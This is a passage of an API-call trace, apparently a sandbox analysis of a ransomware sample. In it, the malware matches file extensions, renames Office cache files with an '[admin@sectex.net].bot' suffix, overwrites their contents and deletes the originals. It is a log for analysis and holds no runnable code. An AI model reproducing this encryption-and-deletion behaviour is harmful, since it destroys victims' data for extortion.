	[0035.813] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0035.813] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75
	[0035.813] lstrlenW (lpString=".zip") returned 4
	[0035.813] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0035.813] lstrlenW (lpString=".rar") returned 4
	[0035.813] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0035.813] lstrlenW (lpString=".bz2") returned 4
	[0035.813] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0035.813] lstrlenW (lpString=".7z") returned 3
	[0035.813] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0035.813] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75
	[0035.813] lstrlenW (lpString=".dbf") returned 4
	[0035.813] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0035.813] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75
	[0035.814] lstrlenW (lpString=".1cd") returned 4
	[0035.814] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0035.814] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75
	[0035.814] lstrlenW (lpString=".jpg") returned 4
	[0035.814] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0035.814] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75
	[0035.814] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75
	[0035.814] lstrlenW (lpString=".doc") returned 4
	[0035.814] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0035.814] lstrlenW (lpString=".docx") returned 5
	[0035.814] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0035.814] lstrlenW (lpString=".pdf") returned 4
	[0035.814] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0035.814] lstrlenW (lpString=".xls") returned 4
	[0035.814] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0035.814] lstrlenW (lpString=".xlsx") returned 5
	[0035.814] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0035.814] lstrlenW (lpString=".ppt") returned 4
	[0035.814] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0035.814] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75
	[0035.814] lstrlenW (lpString=".zip") returned 4
	[0035.814] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0035.814] lstrlenW (lpString=".rar") returned 4
	[0035.814] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0035.814] lstrlenW (lpString=".bz2") returned 4
	[0035.814] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0035.814] lstrlenW (lpString=".7z") returned 3
	[0035.814] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0035.814] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75
	[0035.814] lstrlenW (lpString=".dbf") returned 4
	[0035.814] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0035.814] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75
	[0035.814] lstrlenW (lpString=".1cd") returned 4
	[0035.814] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0035.815] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75
	[0035.815] lstrlenW (lpString=".jpg") returned 4
	[0035.815] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0035.815] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0035.815] lstrlenW (lpString="PubLR.cab") returned 9
	[0035.815] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0035.815] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=9958388) returned 1
	[0035.815] CloseHandle (hObject=0x184) returned 1
	[0035.815] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab")) returned 0x2020
	[0035.815] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.815] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0035.816] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0035.816] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0x0) returned 1
	[0035.816] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0035.816] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0b0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0035.935] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x32a6a6, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0035.936] ReadFile (in: hFile=0x184, lpBuffer=0xb0f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0f0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0035.950] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0035.950] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x93f3f4, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0035.950] ReadFile (in: hFile=0x184, lpBuffer=0xb130058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb130058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0035.968] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.968] WriteFile (in: hFile=0x184, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0xa55fcb0, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fcb0*=0xc00fe, lpOverlapped=0x0) returned 1
	[0036.359] SetEndOfFile (hFile=0x184) returned 1
	[0036.359] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb748
	[0036.363] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0036.363] WriteFile (in: hFile=0x184, lpBuffer=0xb4fb748*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb748*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0036.364] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x32a6a6, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0036.364] WriteFile (in: hFile=0x184, lpBuffer=0xb4fb748*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb748*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0036.368] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x93f3f4, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0036.368] WriteFile (in: hFile=0x184, lpBuffer=0xb4fb748*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb748*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0036.373] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb748 | out: hHeap=0x7d60000) returned 1
	[0036.373] CloseHandle (hObject=0x184) returned 1
	[0039.771] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0039.771] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72
	[0039.771] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72
	[0039.771] lstrlenW (lpString=".doc") returned 4
	[0039.772] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0039.772] lstrlenW (lpString=".docx") returned 5
	[0039.772] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0039.772] lstrlenW (lpString=".pdf") returned 4
	[0039.772] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0039.772] lstrlenW (lpString=".xls") returned 4
	[0039.772] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0039.772] lstrlenW (lpString=".xlsx") returned 5
	[0039.772] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0039.772] lstrlenW (lpString=".ppt") returned 4
	[0039.772] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0039.772] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72
	[0039.772] lstrlenW (lpString=".zip") returned 4
	[0039.772] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0039.772] lstrlenW (lpString=".rar") returned 4
	[0039.772] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0039.772] lstrlenW (lpString=".bz2") returned 4
	[0039.772] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0039.772] lstrlenW (lpString=".7z") returned 3
	[0039.772] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0039.772] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72
	[0039.772] lstrlenW (lpString=".dbf") returned 4
	[0039.772] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0039.772] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72
	[0039.772] lstrlenW (lpString=".1cd") returned 4
	[0039.772] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0039.772] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72
	[0039.772] lstrlenW (lpString=".jpg") returned 4
	[0039.772] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0039.772] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72
	[0039.772] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72
	[0039.773] lstrlenW (lpString=".doc") returned 4
	[0039.773] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0039.773] lstrlenW (lpString=".docx") returned 5
	[0039.773] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0039.773] lstrlenW (lpString=".pdf") returned 4
	[0039.773] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0039.773] lstrlenW (lpString=".xls") returned 4
	[0039.773] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0039.773] lstrlenW (lpString=".xlsx") returned 5
	[0039.773] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0039.773] lstrlenW (lpString=".ppt") returned 4
	[0039.773] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0039.773] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72
	[0039.773] lstrlenW (lpString=".zip") returned 4
	[0039.773] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0039.773] lstrlenW (lpString=".rar") returned 4
	[0039.773] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0039.773] lstrlenW (lpString=".bz2") returned 4
	[0039.773] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0039.773] lstrlenW (lpString=".7z") returned 3
	[0039.773] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0039.773] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72
	[0039.773] lstrlenW (lpString=".dbf") returned 4
	[0039.773] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0039.773] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72
	[0039.773] lstrlenW (lpString=".1cd") returned 4
	[0039.773] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0039.773] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72
	[0039.774] lstrlenW (lpString=".jpg") returned 4
	[0039.774] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0039.774] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0039.774] lstrlenW (lpString="Proof.msi") returned 9
	[0039.774] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0040.286] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=875520) returned 1
	[0040.286] CloseHandle (hObject=0x184) returned 1
	[0040.286] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 0x2020
	[0040.286] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.286] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0040.286] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.287] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.287] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4
	[0040.287] GetLastError () returned 0x0
	[0040.287] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0xd5c00, lpOverlapped=0x0) returned 1
	[0040.311] WriteFile (in: hFile=0x1a4, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xd5c10, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xd5c10, lpOverlapped=0x0) returned 1
	[0040.685] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0040.685] WriteFile (in: hFile=0x1a4, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0040.685] SetEndOfFile (hFile=0x1a4) returned 1
	[0040.685] CloseHandle (hObject=0x1a4) returned 1
	[0040.693] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.693] SetEndOfFile (hFile=0x184) returned 1
	[0040.700] CloseHandle (hObject=0x184) returned 1
	[0040.700] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0040.700] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 1
	[0040.701] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81
	[0040.701] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81
	[0040.701] lstrlenW (lpString=".doc") returned 4
	[0040.701] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0040.701] lstrlenW (lpString=".docx") returned 5
	[0040.701] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1
	[0040.701] lstrlenW (lpString=".pdf") returned 4
	[0040.701] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0040.701] lstrlenW (lpString=".xls") returned 4
	[0040.701] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0040.701] lstrlenW (lpString=".xlsx") returned 5
	[0040.701] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1
	[0040.701] lstrlenW (lpString=".ppt") returned 4
	[0040.701] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0040.701] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81
	[0040.701] lstrlenW (lpString=".zip") returned 4
	[0040.701] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0040.701] lstrlenW (lpString=".rar") returned 4
	[0040.701] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0040.701] lstrlenW (lpString=".bz2") returned 4
	[0040.701] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0040.701] lstrlenW (lpString=".7z") returned 3
	[0040.701] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0040.701] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81
	[0040.701] lstrlenW (lpString=".dbf") returned 4
	[0040.701] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0040.701] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81
	[0040.701] lstrlenW (lpString=".1cd") returned 4
	[0040.701] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0040.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81
	[0040.702] lstrlenW (lpString=".jpg") returned 4
	[0040.702] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0040.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81
	[0040.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81
	[0040.702] lstrlenW (lpString=".doc") returned 4
	[0040.702] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0040.702] lstrlenW (lpString=".docx") returned 5
	[0040.702] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1
	[0040.702] lstrlenW (lpString=".pdf") returned 4
	[0040.702] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0040.702] lstrlenW (lpString=".xls") returned 4
	[0040.702] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0040.702] lstrlenW (lpString=".xlsx") returned 5
	[0040.702] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1
	[0040.702] lstrlenW (lpString=".ppt") returned 4
	[0040.702] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0040.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81
	[0040.702] lstrlenW (lpString=".zip") returned 4
	[0040.702] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0040.702] lstrlenW (lpString=".rar") returned 4
	[0040.702] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0040.702] lstrlenW (lpString=".bz2") returned 4
	[0040.702] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0040.702] lstrlenW (lpString=".7z") returned 3
	[0040.702] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0040.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81
	[0040.702] lstrlenW (lpString=".dbf") returned 4
	[0040.702] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0040.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81
	[0040.702] lstrlenW (lpString=".1cd") returned 4
	[0040.702] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0040.702] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81
	[0040.702] lstrlenW (lpString=".jpg") returned 4
	[0040.702] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0040.703] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0040.703] lstrlenW (lpString="Proof.msi") returned 9
	[0040.703] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0040.703] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=881152) returned 1
	[0040.703] CloseHandle (hObject=0x184) returned 1
	[0040.703] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 0x2020
	[0040.703] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.703] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0040.703] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.703] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.703] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4
	[0040.704] GetLastError () returned 0x0
